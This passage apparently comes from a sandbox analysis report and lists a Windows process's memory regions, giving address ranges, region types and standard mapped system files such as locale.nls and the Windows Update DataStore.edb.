	        start_va = 0x2a8ca80000
	          end_va = 0x2a8cb7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ca80000"
	        filename = ""

Region:
	              id = 747
	        start_va = 0x2a8cb80000
	          end_va = 0x2a8cc7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8cb80000"
	        filename = ""

Region:
	              id = 748
	        start_va = 0x2a8cc80000
	          end_va = 0x2a8ccfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8cc80000"
	        filename = ""

Region:
	              id = 749
	        start_va = 0x2a8cd00000
	          end_va = 0x2a8cd7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8cd00000"
	        filename = ""

Region:
	              id = 750
	        start_va = 0x2a8cd80000
	          end_va = 0x2a8ce7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8cd80000"
	        filename = ""

Region:
	              id = 751
	        start_va = 0x2a8ce80000
	          end_va = 0x2a8cefffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ce80000"
	        filename = ""

Region:
	              id = 752
	        start_va = 0x2a8cf00000
	          end_va = 0x2a8cf7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8cf00000"
	        filename = ""

Region:
	              id = 753
	        start_va = 0x2a8cf80000
	          end_va = 0x2a8cffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8cf80000"
	        filename = ""

Region:
	              id = 754
	        start_va = 0x2a8d100000
	          end_va = 0x2a8d1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8d100000"
	        filename = ""

Region:
	              id = 755
	        start_va = 0x2a8d200000
	          end_va = 0x2a8d27ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8d200000"
	        filename = ""

Region:
	              id = 756
	        start_va = 0x2a8d280000
	          end_va = 0x2a8d37ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8d280000"
	        filename = ""

Region:
	              id = 757
	        start_va = 0x2a8d380000
	          end_va = 0x2a8d47ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8d380000"
	        filename = ""

Region:
	              id = 758
	        start_va = 0x2a8d880000
	          end_va = 0x2a8d97ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8d880000"
	        filename = ""

Region:
	              id = 759
	        start_va = 0x2a8d980000
	          end_va = 0x2a8da7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8d980000"
	        filename = ""

Region:
	              id = 760
	        start_va = 0x2a8da80000
	          end_va = 0x2a8db7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8da80000"
	        filename = ""

Region:
	              id = 761
	        start_va = 0x2a8dc80000
	          end_va = 0x2a8dd7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8dc80000"
	        filename = ""

Region:
	              id = 762
	        start_va = 0x2a8dd80000
	          end_va = 0x2a8de7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8dd80000"
	        filename = ""

Region:
	              id = 763
	        start_va = 0x2a8de80000
	          end_va = 0x2a8df7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8de80000"
	        filename = ""

Region:
	              id = 764
	        start_va = 0x2a8df80000
	          end_va = 0x2a8e07ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8df80000"
	        filename = ""

Region:
	              id = 765
	        start_va = 0x2a8e080000
	          end_va = 0x2a8e0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e080000"
	        filename = ""

Region:
	              id = 766
	        start_va = 0x2a8e100000
	          end_va = 0x2a8e1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e100000"
	        filename = ""

Region:
	              id = 767
	        start_va = 0x2a8e300000
	          end_va = 0x2a8e3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e300000"
	        filename = ""

Region:
	              id = 768
	        start_va = 0x2a8e400000
	          end_va = 0x2a8e4fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e400000"
	        filename = ""

Region:
	              id = 769
	        start_va = 0x2a8e500000
	          end_va = 0x2a8e5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e500000"
	        filename = ""

Region:
	              id = 770
	        start_va = 0x2a8e600000
	          end_va = 0x2a8e6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e600000"
	        filename = ""

Region:
	              id = 771
	        start_va = 0x2a8e700000
	          end_va = 0x2a8e7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e700000"
	        filename = ""

Region:
	              id = 772
	        start_va = 0x2a8e800000
	          end_va = 0x2a8e8fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e800000"
	        filename = ""

Region:
	              id = 773
	        start_va = 0x2a8e900000
	          end_va = 0x2a8e9fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8e900000"
	        filename = ""

Region:
	              id = 774
	        start_va = 0x2a8ea00000
	          end_va = 0x2a8eafffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ea00000"
	        filename = ""

Region:
	              id = 775
	        start_va = 0x2a8eb00000
	          end_va = 0x2a8ebfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8eb00000"
	        filename = ""

Region:
	              id = 776
	        start_va = 0x2a8ec00000
	          end_va = 0x2a8ecfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ec00000"
	        filename = ""

Region:
	              id = 777
	        start_va = 0x2a8ed00000
	          end_va = 0x2a8edfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ed00000"
	        filename = ""

Region:
	              id = 778
	        start_va = 0x2a8f000000
	          end_va = 0x2a8f0fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8f000000"
	        filename = ""

Region:
	              id = 779
	        start_va = 0x2a8f100000
	          end_va = 0x2a8f1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8f100000"
	        filename = ""

Region:
	              id = 780
	        start_va = 0x2a8f600000
	          end_va = 0x2a8f6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8f600000"
	        filename = ""

Region:
	              id = 781
	        start_va = 0x2a8f700000
	          end_va = 0x2a8f7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8f700000"
	        filename = ""

Region:
	              id = 782
	        start_va = 0x2a8f800000
	          end_va = 0x2a8f8fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8f800000"
	        filename = ""

Region:
	              id = 783
	        start_va = 0x2a8f900000
	          end_va = 0x2a8f9fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8f900000"
	        filename = ""

Region:
	              id = 784
	        start_va = 0x2a8fa00000
	          end_va = 0x2a8fafffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8fa00000"
	        filename = ""

Region:
	              id = 785
	        start_va = 0x2a8fb00000
	          end_va = 0x2a8fbfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8fb00000"
	        filename = ""

Region:
	              id = 786
	        start_va = 0x2a8fc00000
	          end_va = 0x2a8fcfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8fc00000"
	        filename = ""

Region:
	              id = 787
	        start_va = 0x2a8fd00000
	          end_va = 0x2a8fdfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8fd00000"
	        filename = ""

Region:
	              id = 788
	        start_va = 0x2a8fe00000
	          end_va = 0x2a8fefffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8fe00000"
	        filename = ""

Region:
	              id = 789
	        start_va = 0x2a8ff00000
	          end_va = 0x2a8fffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a8ff00000"
	        filename = ""

Region:
	              id = 790
	        start_va = 0x2a90000000
	          end_va = 0x2a900fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90000000"
	        filename = ""

Region:
	              id = 791
	        start_va = 0x2a90100000
	          end_va = 0x2a901fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90100000"
	        filename = ""

Region:
	              id = 792
	        start_va = 0x2a90200000
	          end_va = 0x2a902fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90200000"
	        filename = ""

Region:
	              id = 793
	        start_va = 0x2a90300000
	          end_va = 0x2a903fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90300000"
	        filename = ""

Region:
	              id = 794
	        start_va = 0x2a90400000
	          end_va = 0x2a904fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90400000"
	        filename = ""

Region:
	              id = 795
	        start_va = 0x2a90500000
	          end_va = 0x2a905fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90500000"
	        filename = ""

Region:
	              id = 796
	        start_va = 0x2a90600000
	          end_va = 0x2a906fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90600000"
	        filename = ""

Region:
	              id = 797
	        start_va = 0x2a90700000
	          end_va = 0x2a907fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90700000"
	        filename = ""

Region:
	              id = 798
	        start_va = 0x2a90800000
	          end_va = 0x2a9087ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90800000"
	        filename = ""

Region:
	              id = 799
	        start_va = 0x2a90880000
	          end_va = 0x2a9097ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90880000"
	        filename = ""

Region:
	              id = 800
	        start_va = 0x2a90980000
	          end_va = 0x2a90a7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90980000"
	        filename = ""

Region:
	              id = 801
	        start_va = 0x2a90a80000
	          end_va = 0x2a90b7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90a80000"
	        filename = ""

Region:
	              id = 802
	        start_va = 0x2a90b80000
	          end_va = 0x2a90c7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90b80000"
	        filename = ""

Region:
	              id = 803
	        start_va = 0x1656e7b0000
	          end_va = 0x1656e7bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e7b0000"
	        filename = ""

Region:
	              id = 804
	        start_va = 0x1656e7c0000
	          end_va = 0x1656e7c1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e7c0000"
	        filename = ""

Region:
	              id = 805
	        start_va = 0x1656e7d0000
	          end_va = 0x1656e7e4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e7d0000"
	        filename = ""

Region:
	              id = 806
	        start_va = 0x1656e7f0000
	          end_va = 0x1656e7f3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e7f0000"
	        filename = ""

Region:
	              id = 807
	        start_va = 0x1656e800000
	          end_va = 0x1656e800fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e800000"
	        filename = ""

Region:
	              id = 808
	        start_va = 0x1656e810000
	          end_va = 0x1656e811fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656e810000"
	        filename = ""

Region:
	              id = 809
	        start_va = 0x1656e820000
	          end_va = 0x1656e8ddfff
	     entry_point = 0x1656e820000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 810
	        start_va = 0x1656e8e0000
	          end_va = 0x1656e99ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e8e0000"
	        filename = ""

Region:
	              id = 811
	        start_va = 0x1656e9a0000
	          end_va = 0x1656e9a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e9a0000"
	        filename = ""

Region:
	              id = 812
	        start_va = 0x1656e9b0000
	          end_va = 0x1656e9b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656e9b0000"
	        filename = ""

Region:
	              id = 813
	        start_va = 0x1656e9c0000
	          end_va = 0x1656e9c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656e9c0000"
	        filename = ""

Region:
	              id = 814
	        start_va = 0x1656e9d0000
	          end_va = 0x1656e9d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656e9d0000"
	        filename = ""

Region:
	              id = 815
	        start_va = 0x1656e9e0000
	          end_va = 0x1656e9e0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e9e0000"
	        filename = ""

Region:
	              id = 816
	        start_va = 0x1656e9f0000
	          end_va = 0x1656e9f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656e9f0000"
	        filename = ""

Region:
	              id = 817
	        start_va = 0x1656ea00000
	          end_va = 0x1656eafffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656ea00000"
	        filename = ""

Region:
	              id = 818
	        start_va = 0x1656eb00000
	          end_va = 0x1656ec87fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656eb00000"
	        filename = ""

Region:
	              id = 819
	        start_va = 0x1656ec90000
	          end_va = 0x1656ec90fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ec90000"
	        filename = ""

Region:
	              id = 820
	        start_va = 0x1656eca0000
	          end_va = 0x1656ecaffff
	     entry_point = 0x1656eca0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 821
	        start_va = 0x1656ecb0000
	          end_va = 0x1656ecb1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ecb0000"
	        filename = ""

Region:
	              id = 822
	        start_va = 0x1656ecc0000
	          end_va = 0x1656ecc0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ecc0000"
	        filename = ""

Region:
	              id = 823
	        start_va = 0x1656ecd0000
	          end_va = 0x1656ecd1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ecd0000"
	        filename = ""

Region:
	              id = 824
	        start_va = 0x1656ece0000
	          end_va = 0x1656ece3fff
	     entry_point = 0x1656ece0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 825
	        start_va = 0x1656ecf0000
	          end_va = 0x1656ecf6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656ecf0000"
	        filename = ""

Region:
	              id = 826
	        start_va = 0x1656ed00000
	          end_va = 0x1656edfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656ed00000"
	        filename = ""

Region:
	              id = 827
	        start_va = 0x1656ee00000
	          end_va = 0x1656ef80fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ee00000"
	        filename = ""

Region:
	              id = 828
	        start_va = 0x1656ef90000
	          end_va = 0x1656f38afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ef90000"
	        filename = ""

Region:
	              id = 829
	        start_va = 0x1656f390000
	          end_va = 0x1656f48ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656f390000"
	        filename = ""

Region:
	              id = 830
	        start_va = 0x1656f490000
	          end_va = 0x1656f4d4fff
	     entry_point = 0x1656f490000
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")

Region:
	              id = 831
	        start_va = 0x1656f4e0000
	          end_va = 0x1656f4e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656f4e0000"
	        filename = ""

Region:
	              id = 832
	        start_va = 0x1656f4f0000
	          end_va = 0x1656f4f3fff
	     entry_point = 0x1656f4f0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 833
	        start_va = 0x1656f500000
	          end_va = 0x1656f5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656f500000"
	        filename = ""

Region:
	              id = 834
	        start_va = 0x1656f600000
	          end_va = 0x1656f6dffff
	     entry_point = 0x1656f600000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 835
	        start_va = 0x1656f6e0000
	          end_va = 0x1656f76dfff
	     entry_point = 0x1656f6e0000
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 836
	        start_va = 0x1656f770000
	          end_va = 0x1656f771fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656f770000"
	        filename = ""

Region:
	              id = 837
	        start_va = 0x1656f780000
	          end_va = 0x1656f781fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656f780000"
	        filename = ""

Region:
	              id = 838
	        start_va = 0x1656f790000
	          end_va = 0x1656f796fff
	     entry_point = 0x1656f790000
	     region_type = mapped_file
	            name = "newdev.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui")

Region:
	              id = 839
	        start_va = 0x1656f7a0000
	          end_va = 0x1656f7e2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656f7a0000"
	        filename = ""

Region:
	              id = 840
	        start_va = 0x1656f7f0000
	          end_va = 0x1656f7f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656f7f0000"
	        filename = ""

Region:
	              id = 841
	        start_va = 0x1656f800000
	          end_va = 0x1656f8fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656f800000"
	        filename = ""

Region:
	              id = 842
	        start_va = 0x1656f900000
	          end_va = 0x1656fc36fff
	     entry_point = 0x1656f900000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 843
	        start_va = 0x1656fc40000
	          end_va = 0x1656fd3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fc40000"
	        filename = ""

Region:
	              id = 844
	        start_va = 0x1656fd40000
	          end_va = 0x1656fd40fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fd40000"
	        filename = ""

Region:
	              id = 845
	        start_va = 0x1656fd50000
	          end_va = 0x1656fd5ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fd50000"
	        filename = ""

Region:
	              id = 846
	        start_va = 0x1656fd60000
	          end_va = 0x1656fd6ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fd60000"
	        filename = ""

Region:
	              id = 847
	        start_va = 0x1656fd70000
	          end_va = 0x1656fd7ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fd70000"
	        filename = ""

Region:
	              id = 848
	        start_va = 0x1656fd80000
	          end_va = 0x1656fd8ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fd80000"
	        filename = ""

Region:
	              id = 849
	        start_va = 0x1656fd90000
	          end_va = 0x1656fd9ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fd90000"
	        filename = ""

Region:
	              id = 850
	        start_va = 0x1656fda0000
	          end_va = 0x1656fdaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fda0000"
	        filename = ""

Region:
	              id = 851
	        start_va = 0x1656fdb0000
	          end_va = 0x1656fdb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fdb0000"
	        filename = ""

Region:
	              id = 852
	        start_va = 0x1656fdc0000
	          end_va = 0x1656fe0dfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fdc0000"
	        filename = ""

Region:
	              id = 853
	        start_va = 0x1656fe10000
	          end_va = 0x1656fe13fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe10000"
	        filename = ""

Region:
	              id = 854
	        start_va = 0x1656fe20000
	          end_va = 0x1656fe2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe20000"
	        filename = ""

Region:
	              id = 855
	        start_va = 0x1656fe30000
	          end_va = 0x1656fe36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe30000"
	        filename = ""

Region:
	              id = 856
	        start_va = 0x1656fe40000
	          end_va = 0x1656fe8dfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe40000"
	        filename = ""

Region:
	              id = 857
	        start_va = 0x1656fe90000
	          end_va = 0x1656fe9ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fe90000"
	        filename = ""

Region:
	              id = 858
	        start_va = 0x1656fea0000
	          end_va = 0x1656feaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fea0000"
	        filename = ""

Region:
	              id = 859
	        start_va = 0x1656feb0000
	          end_va = 0x1656febffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656feb0000"
	        filename = ""

Region:
	              id = 860
	        start_va = 0x1656fec0000
	          end_va = 0x1656fecffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fec0000"
	        filename = ""

Region:
	              id = 861
	        start_va = 0x1656fed0000
	          end_va = 0x1656fedffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fed0000"
	        filename = ""

Region:
	              id = 862
	        start_va = 0x1656fee0000
	          end_va = 0x1656feeffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fee0000"
	        filename = ""

Region:
	              id = 863
	        start_va = 0x1656fef0000
	          end_va = 0x1656fefffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fef0000"
	        filename = ""

Region:
	              id = 864
	        start_va = 0x1656ff00000
	          end_va = 0x1656fffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656ff00000"
	        filename = ""

Region:
	              id = 865
	        start_va = 0x16570000000
	          end_va = 0x165700fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570000000"
	        filename = ""

Region:
	              id = 866
	        start_va = 0x16570100000
	          end_va = 0x165701fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570100000"
	        filename = ""

Region:
	              id = 867
	        start_va = 0x16570200000
	          end_va = 0x165702fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570200000"
	        filename = ""

Region:
	              id = 868
	        start_va = 0x16570300000
	          end_va = 0x16570300fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570300000"
	        filename = ""

Region:
	              id = 869
	        start_va = 0x16570310000
	          end_va = 0x16570310fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570310000"
	        filename = ""

Region:
	              id = 870
	        start_va = 0x16570320000
	          end_va = 0x16570323fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570320000"
	        filename = ""

Region:
	              id = 871
	        start_va = 0x16570330000
	          end_va = 0x16570331fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570330000"
	        filename = ""

Region:
	              id = 872
	        start_va = 0x16570340000
	          end_va = 0x16570346fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570340000"
	        filename = ""

Region:
	              id = 873
	        start_va = 0x16570350000
	          end_va = 0x16570350fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570350000"
	        filename = ""

Region:
	              id = 874
	        start_va = 0x16570360000
	          end_va = 0x1657036ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570360000"
	        filename = ""

Region:
	              id = 875
	        start_va = 0x16570370000
	          end_va = 0x1657038ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570370000"
	        filename = ""

Region:
	              id = 876
	        start_va = 0x16570390000
	          end_va = 0x16570393fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570390000"
	        filename = ""

Region:
	              id = 877
	        start_va = 0x165703a0000
	          end_va = 0x165703a1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165703a0000"
	        filename = ""

Region:
	              id = 878
	        start_va = 0x165703b0000
	          end_va = 0x165703bffff
	     entry_point = 0x165703b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 879
	        start_va = 0x165703c0000
	          end_va = 0x165703cffff
	     entry_point = 0x165703c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 880
	        start_va = 0x165703d0000
	          end_va = 0x165703dffff
	     entry_point = 0x165703d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 881
	        start_va = 0x165703e0000
	          end_va = 0x165703effff
	     entry_point = 0x165703e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 882
	        start_va = 0x165703f0000
	          end_va = 0x165703fffff
	     entry_point = 0x165703f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 883
	        start_va = 0x16570400000
	          end_va = 0x165704fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570400000"
	        filename = ""

Region:
	              id = 884
	        start_va = 0x16570500000
	          end_va = 0x165705fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570500000"
	        filename = ""

Region:
	              id = 885
	        start_va = 0x16570600000
	          end_va = 0x165706fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570600000"
	        filename = ""

Region:
	              id = 886
	        start_va = 0x16570700000
	          end_va = 0x165716fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570700000"
	        filename = ""

Region:
	              id = 887
	        start_va = 0x16571700000
	          end_va = 0x1657170ffff
	     entry_point = 0x16571700000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 888
	        start_va = 0x16571710000
	          end_va = 0x1657171ffff
	     entry_point = 0x16571710000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 889
	        start_va = 0x16571720000
	          end_va = 0x1657172ffff
	     entry_point = 0x16571720000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 890
	        start_va = 0x16571730000
	          end_va = 0x1657173ffff
	     entry_point = 0x16571730000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 891
	        start_va = 0x16571740000
	          end_va = 0x1657174ffff
	     entry_point = 0x16571740000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 892
	        start_va = 0x16571750000
